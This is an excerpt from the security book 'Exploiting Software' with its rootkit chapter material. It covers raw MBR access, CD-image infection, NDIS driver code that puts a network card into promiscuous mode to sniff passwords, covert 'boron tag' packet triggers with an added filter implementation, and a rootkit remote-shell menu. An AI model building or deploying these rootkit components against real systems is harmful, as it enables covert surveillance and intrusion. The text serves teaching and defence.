- •Exploiting Software How to Break Code
- •Table of Contents
- •Copyright
- •Praise for Exploiting Software
- •Attack Patterns
- •Foreword
- •Preface
- •What This Book Is About
- •How to Use This Book
- •But Isn't This Too Dangerous?
- •Acknowledgments
- •Greg's Acknowledgments
- •Gary's Acknowledgments
- •Bad Software Is Ubiquitous
- •The Trinity of Trouble
- •The Future of Software
- •What Is Software Security?
- •Conclusion
- •Chapter 2. Attack Patterns
- •A Taxonomy
- •An Open-Systems View
- •Tour of an Exploit
- •Attack Patterns: Blueprints for Disaster
- •An Example Exploit: Microsoft's Broken C++ Compiler
- •Applying Attack Patterns
- •Attack Pattern Boxes
- •Conclusion
- •Into the House of Logic
- •Should Reverse Engineering Be Illegal?
- •Reverse Engineering Tools and Concepts
- •Approaches to Reverse Engineering
- •Methods of the Reverser
- •Writing Interactive Disassembler (IDA) Plugins
- •Decompiling and Disassembling Software
- •Decompilation in Practice: Reversing helpctr.exe
- •Automatic, Bulk Auditing for Vulnerabilities
- •Writing Your Own Cracking Tools
- •Building a Basic Code Coverage Tool
- •Conclusion
- •Chapter 4. Exploiting Server Software
- •The Trusted Input Problem
- •The Privilege Escalation Problem
- •Finding Injection Points
- •Input Path Tracing
- •Exploiting Trust through Configuration
- •Specific Techniques and Attacks for Server Software
- •Conclusion
- •Chapter 5. Exploiting Client Software
- •Client-side Programs as Attack Targets
- •In-band Signals
- •Cross-site Scripting (XSS)
- •Client Scripts and Malicious Code
- •Content-Based Attacks
- •Conclusion
- •Chapter 6. Crafting (Malicious) Input
- •The Defender's Dilemma
- •Intrusion Detection (Not)
- •Partition Analysis
- •Tracing Code
- •Reversing Parser Code
- •Misclassification
- •Audit Poisoning
- •Conclusion
- •Chapter 7. Buffer Overflow
- •Buffer Overflow 101
- •Injection Vectors: Input Rides Again
- •Buffer Overflows and Embedded Systems
- •Database Buffer Overflows
- •Buffer Overflows and Java?!
- •Content-Based Buffer Overflow
- •Audit Truncation and Filters with Buffer Overflow
- •Causing Overflow with Environment Variables
- •The Multiple Operation Problem
- •Finding Potential Buffer Overflows
- •Stack Overflow
- •Arithmetic Errors in Memory Management
- •Format String Vulnerabilities
- •Heap Overflows
- •Buffer Overflows and C++
- •Payloads
- •Payloads on RISC Architectures
- •Multiplatform Payloads
- •Prolog/Epilog Code to Protect Functions
- •Conclusion
- •Chapter 8. Rootkits
- •Subversive Programs
- •A Simple Windows XP Kernel Rootkit
- •Call Hooking
- •Trojan Executable Redirection
- •Hiding Files and Directories
- •Patching Binary Code
- •The Hardware Virus
- •Low-Level Disk Access
- •Adding Network Support to a Driver
- •Interrupts
- •Key Logging
- •Advanced Rootkit Topics
- •Conclusion
- •References
- •Index
• Table of Contents
• Index
Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Low-Level Disk Access
Another traditional place to store a virus has been the boot block of floppy disks and hard drives. Interestingly enough, these techniques still work today, and it is quite simple to access the boot block of a drive. The following code illustrates a simple method to read and write the master boot record on an NT system.

Reading/Writing the Master Boot Record (MBR)
To obtain access to the MBR you must have raw read/write access to the physical drive itself. Using a simple call to CreateFile and the proper object name, you can open any of the drives on a system. The following code shows how to open a handle to the first physical drive and subsequently read the first 512 bytes of data from it. This block of data contains the contents of the first drive sector, otherwise known as the MBR.

    #include <windows.h>

    char  mbr_data[512];
    DWORD dwBytesRead;

    /* \\.\PhysicalDrive0 is the first physical disk. Opening it this way
       needs administrative rights and bypasses the file system entirely. */
    HANDLE hDriver = CreateFile("\\\\.\\physicaldrive0",
                                GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE,
                                0,
                                OPEN_EXISTING,
                                0,
                                0);
    if (hDriver == INVALID_HANDLE_VALUE)
        return;   /* not running as administrator, or no such drive */

    /* sector 0 of the disk: 446 bytes of boot code, the partition
       table, and the 0x55 0xAA signature */
    ReadFile( hDriver, mbr_data, 512, &dwBytesRead, NULL );

Writing the sector back is just a WriteFile on the same handle, which is why a boot-block infection amounts to nothing more than a 512-byte write. The corresponding defensive check is equally simple: keep a copy of the sector and compare the boot-code bytes against it.
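The sector read above is only useful once it is decoded. What follows is an added example, not code from the book or from rootkit.com: a portable C parser for the 512-byte MBR layout (446 bytes of boot code, four 16-byte partition entries, the 0x55 0xAA signature), plus a fingerprint of the boot-code bytes that a defender can record at install time and compare later to notice a rewritten boot block. The sample sector is constructed inline so the program runs offline; on Windows the same buffer would be filled by the ReadFile call shown above, and a raw disk image can be passed as the first argument instead. The FNV-1a fingerprint and the sample partition values are this example's own choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MBR_SIZE      512
#define MBR_BOOTCODE  446      /* bytes of boot code before the partition table */
#define MBR_PART_OFF  446
#define MBR_PART_SIZE 16
#define MBR_SIG_OFF   510

struct mbr_part {
    uint8_t  bootable;    /* 0x80 marks the active partition */
    uint8_t  type;        /* partition type id; 0 means the slot is unused */
    uint32_t lba_start;   /* first sector (stored little-endian on disk) */
    uint32_t sectors;     /* length in sectors */
};

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the partition table. Returns the number of in-use entries,
 * or -1 when the 0x55 0xAA signature is missing (not a valid MBR). */
int parse_mbr(const uint8_t *sector, struct mbr_part out[4])
{
    int used = 0, i;
    if (sector[MBR_SIG_OFF] != 0x55 || sector[MBR_SIG_OFF + 1] != 0xAA)
        return -1;
    for (i = 0; i < 4; i++) {
        const uint8_t *e = sector + MBR_PART_OFF + i * MBR_PART_SIZE;
        out[i].bootable  = e[0];
        out[i].type      = e[4];
        out[i].lba_start = rd_le32(e + 8);
        out[i].sectors   = rd_le32(e + 12);
        if (out[i].type != 0)
            used++;
    }
    return used;
}

/* FNV-1a over the boot-code region only (the partition table may change
 * legitimately). A boot-block infection has to rewrite these bytes, so a
 * mismatch against the recorded value is worth investigating. */
uint32_t mbr_bootcode_fingerprint(const uint8_t *sector)
{
    uint32_t h = 0x811C9DC5u;
    int i;
    for (i = 0; i < MBR_BOOTCODE; i++) {
        h ^= sector[i];
        h *= 0x01000193u;
    }
    return h;
}

/* Constructed sample sector (not read from a real disk): zeroed boot code and
 * one active NTFS (type 0x07) partition at LBA 2048, 0x100000 sectors long. */
void build_sample_mbr(uint8_t sector[MBR_SIZE])
{
    static const uint8_t entry0[MBR_PART_SIZE] = {
        0x80, 0x20, 0x21, 0x00,  0x07, 0xFE, 0xFF, 0xFF,
        0x00, 0x08, 0x00, 0x00,  0x00, 0x00, 0x10, 0x00
    };
    memset(sector, 0, MBR_SIZE);
    memcpy(sector + MBR_PART_OFF, entry0, MBR_PART_SIZE);
    sector[MBR_SIG_OFF]     = 0x55;
    sector[MBR_SIG_OFF + 1] = 0xAA;
}

int main(int argc, char **argv)
{
    uint8_t sector[MBR_SIZE];
    struct mbr_part parts[4];
    int n, i;

    if (argc > 1) {    /* optional: a raw disk image, or a dd copy of sector 0 */
        FILE *f = fopen(argv[1], "rb");
        if (f == NULL || fread(sector, 1, MBR_SIZE, f) != MBR_SIZE) {
            fprintf(stderr, "cannot read %d bytes from %s\n", MBR_SIZE, argv[1]);
            return 1;
        }
        fclose(f);
    } else {
        build_sample_mbr(sector);
    }

    n = parse_mbr(sector, parts);
    if (n < 0) {
        puts("no 0x55AA signature: not an MBR");
        return 1;
    }
    printf("boot code fingerprint: %08x, %d partition(s)\n",
           (unsigned)mbr_bootcode_fingerprint(sector), n);
    for (i = 0; i < 4; i++)
        if (parts[i].type != 0)
            printf("  slot %d: type 0x%02x  start %u  length %u%s\n", i,
                   parts[i].type, (unsigned)parts[i].lba_start,
                   (unsigned)parts[i].sectors,
                   parts[i].bootable == 0x80 ? "  (active)" : "");
    return 0;
}
```

Run with no arguments to decode the built-in sample, or with the path of a raw image (for instance a dd copy of sector 0). The fingerprint deliberately excludes the partition table and signature, so repartitioning does not raise a false alarm while any change to the code the BIOS executes does.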
Infecting CD-ROM Images
CD-ROMs use the ISO 9660 file system. These can be infected with virus programs in much the same way that floppy disks can. A bootable CD can most certainly contain a virus that is activated on boot. Another trick is the AUTORUN.INF file, which causes programs to be launched automatically when the CD is inserted; this feature is often on by default. Lastly, files on the CD can simply be infected using standard tricks. There is nothing stopping a virus or rootkit from accessing a CD-R drive and burning information to a mounted (writable) CD disk.[7]

[7] More on the idea of infecting CD images can be found in the 'zine 29A Labs, issue 6, "Infecting ISO CD Images" by ZOMBiE.
Adding Network Support to a Driver
Allowing a rootkit driver to talk to the network adds a final but critical touch, allowing the code to be accessed remotely. It is possible to embed a TCP/IP stack into a driver and open a remote shell. In fact, the popular kernel-mode debugger SoftICE has this feature. The NTROOT rootkit distributed from www.rootkit.com has sample code that exposes a TCP/IP shell. Under Windows NT, an easy way to build network support is to use the NDIS library. Unfortunately, not many device driver books cover the subject of network device drivers. Thus, use of NDIS has not been well documented outside the DDK.

Using the NDIS Library
Microsoft supplies the NDIS library for network and protocol drivers to implement their own stack independent of the network card. We can use this library to build a stack and communicate with the network. This is one way that a rootkit driver can provide an interactive shell.

The first step in using NDIS is to register a set of callback functions for NDIS operations. The OnXXX values are pointers to callback functions.[8]

[8] Complete source for these examples can be obtained from http://www.rootkit.com.

    NTSTATUS DriverEntry( IN PDRIVER_OBJECT  theDriverObject,
                          IN PUNICODE_STRING theRegistryPath )
    {
        NDIS_PROTOCOL_CHARACTERISTICS aProtocolChar;
        UNICODE_STRING                aDriverName;

        /* aStatus, aErrorStatus, aNdisProtocolHandle, aProtoName, aMediumArray,
           anOpenP and aDeviceExtension are declared in the parts of the
           driver source elided ("...") below. */

        /*
         * init network sniffer - this is all standard and
         * documented in the DDK.
         */
        RtlZeroMemory( &aProtocolChar,
                       sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
        aProtocolChar.MajorNdisVersion            = 3;
        aProtocolChar.MinorNdisVersion            = 0;
        aProtocolChar.Reserved                    = 0;
        aProtocolChar.OpenAdapterCompleteHandler  = OnOpenAdapterDone;
        aProtocolChar.CloseAdapterCompleteHandler = OnCloseAdapterDone;
        aProtocolChar.SendCompleteHandler         = OnSendDone;
        aProtocolChar.TransferDataCompleteHandler = OnTransferDataDone;
        aProtocolChar.ResetCompleteHandler        = OnResetDone;
        aProtocolChar.RequestCompleteHandler      = OnRequestDone;
        aProtocolChar.ReceiveHandler              = OnReceiveStub;
        aProtocolChar.ReceiveCompleteHandler      = OnReceiveDoneStub;
        aProtocolChar.StatusHandler               = OnStatus;
        aProtocolChar.StatusCompleteHandler       = OnStatusDone;
        aProtocolChar.Name                        = aProtoName;

        DbgPrint("ROOTKIT: Registering NDIS Protocol\n");

        NdisRegisterProtocol( &aStatus,
                              &aNdisProtocolHandle,
                              &aProtocolChar,
                              sizeof(NDIS_PROTOCOL_CHARACTERISTICS));

        if (aStatus != NDIS_STATUS_SUCCESS) {
            DbgPrint("DriverEntry: ERROR NdisRegisterProtocol failed\n");
            return aStatus;
        }

        aDriverName.Length        = 0;
        aDriverName.Buffer        = ExAllocatePool( PagedPool, MAX_PATH_LENGTH );
        aDriverName.MaximumLength = MAX_PATH_LENGTH;
        if (aDriverName.Buffer == NULL) {
            return STATUS_INSUFFICIENT_RESOURCES;
        }
        RtlZeroMemory(aDriverName.Buffer, MAX_PATH_LENGTH);

        /* _______________________________________________________________
         * get the name of the MAC-layer driver
         * and the name of the packet driver
         * HKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkage ..
         * (the ReadRegistry shown later takes the adapter GUID from
         *  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards)
         * _______________________________________________________________ */
        if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS) {
            goto RegistryError;
        }

        ...

        NdisOpenAdapter(
            &aStatus,
            &aErrorStatus,
            &anOpenP->AdapterHandle,
            &aDeviceExtension->Medium,
            &aMediumArray,
            1,
            aDeviceExtension->NdisProtocolHandle,
            anOpenP,
            &aDeviceExtension->AdapterName,
            0,
            NULL);

        /* NDIS invokes OpenAdapterCompleteHandler itself only when the open
           is pending; on a synchronous completion we must invoke it ourselves */
        if (aStatus != NDIS_STATUS_PENDING)
        {
            OnOpenAdapterDone( anOpenP, aStatus, NDIS_STATUS_SUCCESS );
        }

        ...
    }
The first call is to NdisRegisterProtocol, which is how we register our callback functions. The second call is to ReadRegistry (explained later), which tells us the binding name for the network card. This information is used to initialize the device extension structure that is then used in a call to NdisOpenAdapter. If that call completes synchronously, returning any status other than NDIS_STATUS_PENDING, we must call OnOpenAdapterDone ourselves with that status. If it returns NDIS_STATUS_PENDING, the OS will make the callback to OnOpenAdapterDone on our behalf once the open finishes.
Putting the Interface in Promiscuous Mode
When a network interface is in "promiscuous mode" it can sniff all packets that are physically delivered to the interface, regardless of target address. This is required if you want to see traffic that is destined for other machines on the network. We put the network interface card into promiscuous mode so the rootkit can sniff passwords and other communications channel information. Two caveats: on a switched network the card only ever sees what the switch forwards to its port, so promiscuous mode alone does not expose other hosts' unicast traffic, and the mode itself is visible to anyone who inspects the adapter's packet filter. The setting is performed in the OnOpenAdapterDone call. We use the NdisRequest function to set the interface into promiscuous mode:

    VOID
    OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
                       IN NDIS_STATUS Status,
                       IN NDIS_STATUS OpenErrorStatus )
    {
        PIRP           Irp  = NULL;
        POPEN_INSTANCE Open = NULL;
        NDIS_REQUEST   anNdisRequest;
        NDIS_STATUS    anotherStatus;
        ULONG          aMode = NDIS_PACKET_TYPE_PROMISCUOUS;

        DbgPrint("ROOTKIT: OnOpenAdapterDone called\n");

        /* set card into promiscuous mode */
        if(gOpenInstance){
            //
            // Initializing the event
            //
            NdisInitializeEvent(&gOpenInstance->Event);

            /* OID_GEN_CURRENT_PACKET_FILTER selects which frames the miniport
               indicates up to us; NDIS_PACKET_TYPE_PROMISCUOUS asks for all */
            anNdisRequest.RequestType = NdisRequestSetInformation;
            anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;
            anNdisRequest.DATA.SET_INFORMATION.InformationBuffer = &aMode;
            anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength = sizeof(ULONG);

            /* NOTE: if this returns NDIS_STATUS_PENDING the request structure
               must stay valid until OnRequestDone runs, so in a real driver it
               belongs in the open instance rather than on this stack frame */
            NdisRequest( &anotherStatus,
                         gOpenInstance->AdapterHandle,
                         &anNdisRequest );
        }
        return;
    }
Finding the Correct Network Card
Windows stores information about network cards in the following registry key:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards

Under this key are a series of numbered subkeys. Each subkey represents a network card or interface. The subkey contains a very important value called ServiceName. This value is a string that contains the GUID, which must be used to open the adapter. The rootkit driver must obtain one of these GUID strings to open a binding to the adapter using NDIS. The following code snippet obtains this GUID value for the first network interface listed[9]:

[9] Once again, all this code can be obtained from http://www.rootkit.com as part of the NTROOT rootkit driver.
    /* this is major work just to enum a subkey value */
    NTSTATUS
    EnumSubkeys(
        IN PWSTR           theRegistryPath,
        IN PUNICODE_STRING theStringP
        )
    {
        //----------------------------------------------------
        // for opening parent key
        HANDLE            hKey;
        OBJECT_ATTRIBUTES oa;
        NTSTATUS          Status;
        UNICODE_STRING    ParentPath;

        // for enumerating a subkey
        KEY_BASIC_INFORMATION  Info;
        PKEY_BASIC_INFORMATION pInfo;
        ULONG                  ResultLength;
        ULONG                  Size;
        PWSTR                  Position;
        PWSTR                  FullName;

        // for value query
        RTL_QUERY_REGISTRY_TABLE aParamTable[2];
        //----------------------------------------------------

        DbgPrint("rootkit: entered EnumSubkeys()\n");

        __try
        {
            RtlInitUnicodeString(&ParentPath, theRegistryPath);

            /*
            ** First try opening this key
            */
            InitializeObjectAttributes(&oa,
                                       &ParentPath,
                                       OBJ_CASE_INSENSITIVE,
                                       NULL,
                                       (PSECURITY_DESCRIPTOR)NULL);

            Status = ZwOpenKey(&hKey, KEY_READ, &oa);
            if (!NT_SUCCESS(Status)) {
                return Status;
            }

            /*
            ** First find the length of the subkey data. Info is too small to
            ** hold any real name, so this call normally comes back with
            ** STATUS_BUFFER_OVERFLOW (a warning, not an error) and a filled-in
            ** NameLength; that is why NT_ERROR rather than NT_SUCCESS is tested.
            */
            Status = ZwEnumerateKey(hKey,
                                    0,                 /* index of zero */
                                    KeyBasicInformation,
                                    &Info,
                                    sizeof(Info),
                                    &ResultLength);
            if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) {
                ZwClose(hKey);
                return Status;
            }

            Size  = Info.NameLength + FIELD_OFFSET(KEY_BASIC_INFORMATION, Name[0]);
            pInfo = (PKEY_BASIC_INFORMATION) ExAllocatePool(PagedPool, Size);
            if (pInfo == NULL) {
                ZwClose(hKey);
                return STATUS_INSUFFICIENT_RESOURCES;
            }

            /*
            ** Now enumerate the first subkey.
            */
            Status = ZwEnumerateKey(hKey,
                                    0,
                                    KeyBasicInformation,
                                    pInfo,
                                    Size,
                                    &ResultLength);
            ZwClose(hKey);          /* the parent key is not needed past here */
            if (!NT_SUCCESS(Status)) {
                ExFreePool((PVOID)pInfo);
                return Status;
            }
            if (Size != ResultLength) {
                ExFreePool((PVOID)pInfo);
                return STATUS_INTERNAL_ERROR;
            }

            /*
            ** Generate the fully expanded name and query values.
            */
            FullName = ExAllocatePool(PagedPool,
                                      ParentPath.Length +
                                      sizeof(WCHAR) +            // '\'
                                      pInfo->NameLength + sizeof(UNICODE_NULL));
            if (FullName == NULL) {
                ExFreePool((PVOID)pInfo);
                return STATUS_INSUFFICIENT_RESOURCES;
            }

            RtlCopyMemory((PVOID)FullName,
                          (PVOID)ParentPath.Buffer,
                          ParentPath.Length);
            Position    = FullName + ParentPath.Length / sizeof(WCHAR);
            Position[0] = L'\\';
            Position++;
            RtlCopyMemory((PVOID)Position,
                          (PVOID)pInfo->Name,
                          pInfo->NameLength);
            Position += pInfo->NameLength / sizeof(WCHAR);
            /*
            ** Null terminate.
            */
            Position[0] = UNICODE_NULL;
            ExFreePool((PVOID)pInfo);

            /*
            ** Get the value data for binding.
            */
            RtlZeroMemory( &aParamTable[0], sizeof(aParamTable) );

            aParamTable[0].Flags        = RTL_QUERY_REGISTRY_DIRECT |
                                          RTL_QUERY_REGISTRY_REQUIRED;
            aParamTable[0].Name         = L"ServiceName";
            aParamTable[0].EntryContext = theStringP;   /* UNICODE_STRING whose buffer
                                                           the caller has already allocated */

            // Because we are using required and direct,
            // we don't need to set defaults.
            // IMPORTANT note, the last entry is ALL NULL,
            // required by call to know when it's done. Don't forget!
            Status = RtlQueryRegistryValues(
                         RTL_REGISTRY_ABSOLUTE | RTL_REGISTRY_OPTIONAL,
                         FullName,
                         &aParamTable[0],
                         NULL,
                         NULL );

            ExFreePool((PVOID)FullName);
            return(Status);
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception in EnumSubkeys(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }
    /* ___________________________________________________________________________
     . This code reads the registry to determine the name of the network interface
     . card. It grabs the first registered name, regardless of how many
     . are present. It would be better to bind to all of them, but for
     . simplicity we are only binding to the first.
     . ___________________________________________________________________________ */
    NTSTATUS ReadRegistry( IN PUNICODE_STRING theBindingName ) {
        NTSTATUS       aStatus;
        UNICODE_STRING aString;

        DbgPrint("ROOTKIT: ReadRegistry called\n");

        __try
        {
            aString.Length        = 0;
            aString.Buffer        = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me */
            aString.MaximumLength = MAX_PATH_LENGTH;
            if (aString.Buffer == NULL) {
                return STATUS_INSUFFICIENT_RESOURCES;
            }
            RtlZeroMemory(aString.Buffer, MAX_PATH_LENGTH);

            /* kernel-mode spelling of
               HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
               (note the space in "Windows NT") */
            aStatus = EnumSubkeys(
                L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards",
                &aString );

            if(!NT_SUCCESS(aStatus)){
                DbgPrint("rootkit: EnumSubkeys failed Code = 0x%0x\n", aStatus);
            }
            else{
                /* ServiceName holds the adapter GUID; NDIS binds to \Device\{GUID} */
                RtlAppendUnicodeToString(theBindingName, L"\\Device\\");
                RtlAppendUnicodeStringToString(theBindingName, &aString);
            }
            ExFreePool(aString.Buffer);
            return aStatus; /* success, or the last error */
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            DbgPrint("rootkit: Exception occurred in ReadRegistry(). Unknown error.\n");
        }
        return STATUS_UNSUCCESSFUL;
    }
Using Boron Tags for Security
One nice trick to prevent people from detecting the rootkit network interface is to require a certain source port or IP ID value before the rootkit will respond to a packet. This idea can be extended to any data in the packet, but the key is that some obscure knowledge is required before the rootkit will respond. Remember that a rootkit can be compiled and customized by anyone, thus the choice of obfuscation is left up to your imagination. The flip side is that a fixed tag is itself a signature: once the value leaks, a single packet-filter rule matching that IP ID or source port finds every host running the rootkit.
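The check described above, as an added example that is not part of the book or of the NTROOT source: a receive-side filter in C that parses an Ethernet/IPv4/TCP frame and accepts it only when both the IP Identification field and the TCP source port carry the chosen tag values; everything else is dropped without a reply. The tag constants, the frame builder and the sample addresses are assumptions made for this example. The frame is constructed inline rather than captured, and its checksums are left zero because the filter does not verify them.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define BORON_IP_ID     0xB0B0   /* assumed tag: IPv4 Identification field */
#define BORON_SRC_PORT  31337    /* assumed tag: TCP source port           */

#define ETH_HLEN        14
#define ETH_P_IP        0x0800
#define IPPROTO_TCP_NUM 6

static uint16_t rd_be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Returns 1 if the frame is IPv4/TCP and carries both halves of the tag,
 * otherwise 0. Every length is checked before the corresponding field is
 * read: a receive handler runs on attacker-supplied bytes, and a truncated
 * frame must not push it past the end of the buffer. */
int boron_match(const uint8_t *frame, size_t len)
{
    const uint8_t *ip, *tcp;
    size_t ihl;

    if (len < ETH_HLEN + 20) return 0;             /* no room for an IP header */
    if (rd_be16(frame + 12) != ETH_P_IP) return 0; /* not IPv4                 */

    ip = frame + ETH_HLEN;
    if ((ip[0] >> 4) != 4) return 0;
    ihl = (size_t)(ip[0] & 0x0F) * 4;              /* header length with options */
    if (ihl < 20 || len < ETH_HLEN + ihl + 20) return 0;
    if (ip[9] != IPPROTO_TCP_NUM) return 0;
    if (rd_be16(ip + 4) != BORON_IP_ID) return 0;  /* first half of the tag  */

    tcp = ip + ihl;
    return rd_be16(tcp + 0) == BORON_SRC_PORT;     /* second half of the tag */
}

/* Constructed frame (not a capture): Ethernet + minimal IPv4 + TCP SYN with
 * the IP ID and source port chosen by the caller, so both tagged and untagged
 * frames can be produced. Returns the frame length, or 0 if cap is too small. */
size_t build_frame(uint8_t *buf, size_t cap, uint16_t ip_id, uint16_t sport)
{
    static const uint8_t eth[ETH_HLEN] = {
        0x00,0x11,0x22,0x33,0x44,0x55,   /* dst MAC (made up) */
        0x66,0x77,0x88,0x99,0xAA,0xBB,   /* src MAC (made up) */
        0x08,0x00                        /* EtherType IPv4    */
    };
    uint8_t *ip, *tcp;

    if (cap < ETH_HLEN + 20 + 20) return 0;
    memset(buf, 0, ETH_HLEN + 40);
    memcpy(buf, eth, ETH_HLEN);

    ip = buf + ETH_HLEN;
    ip[0] = 0x45;                                  /* version 4, IHL 5 */
    ip[2] = 0x00; ip[3] = 40;                      /* total length 40  */
    ip[4] = (uint8_t)(ip_id >> 8); ip[5] = (uint8_t)ip_id;
    ip[8] = 64;                                    /* TTL              */
    ip[9] = IPPROTO_TCP_NUM;
    memcpy(ip + 12, "\x0a\x00\x00\x01", 4);        /* 10.0.0.1 ->      */
    memcpy(ip + 16, "\x0a\x00\x00\x02", 4);        /* 10.0.0.2         */

    tcp = ip + 20;
    tcp[0] = (uint8_t)(sport >> 8); tcp[1] = (uint8_t)sport;
    tcp[2] = 0x00; tcp[3] = 80;                    /* dst port 80      */
    tcp[12] = 0x50;                                /* data offset 5    */
    tcp[13] = 0x02;                                /* SYN              */
    return ETH_HLEN + 40;
}
```

In the NDIS driver above this test would sit at the top of the ReceiveHandler (OnReceiveStub), returning NDIS_STATUS_NOT_ACCEPTED for anything that fails it. Requiring two independent fields rather than one keeps ordinary traffic from matching by accident: a random source port hits one value in 65536, but the IP ID has to match as well.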
Adding an Interactive Shell
A rootkit can have a remote TCP/IP shell directly into the kernel. Here is an example of the menu provided by one of the rootkits at www.rootkit.com:

    Win2K Rootkit by the team rootkit.com
    Version 0.4 alpha
    ------------------------------------------
    command          description
    ps               show proclist
    help             this data
    buffertest       debug output
    hidedir          hide prefixed file/dir
    hideproc         hide prefixed processes
    debugint         (BSOD) fire int3
    sniffkeys        toggle keyboard sniffer
    echo <string>    echo the given string

    *(BSOD) means Blue Screen of Death
      if a kernel debugger is not present!

    *'prefixed' means the process or filename
      starts with the letters '_root_'.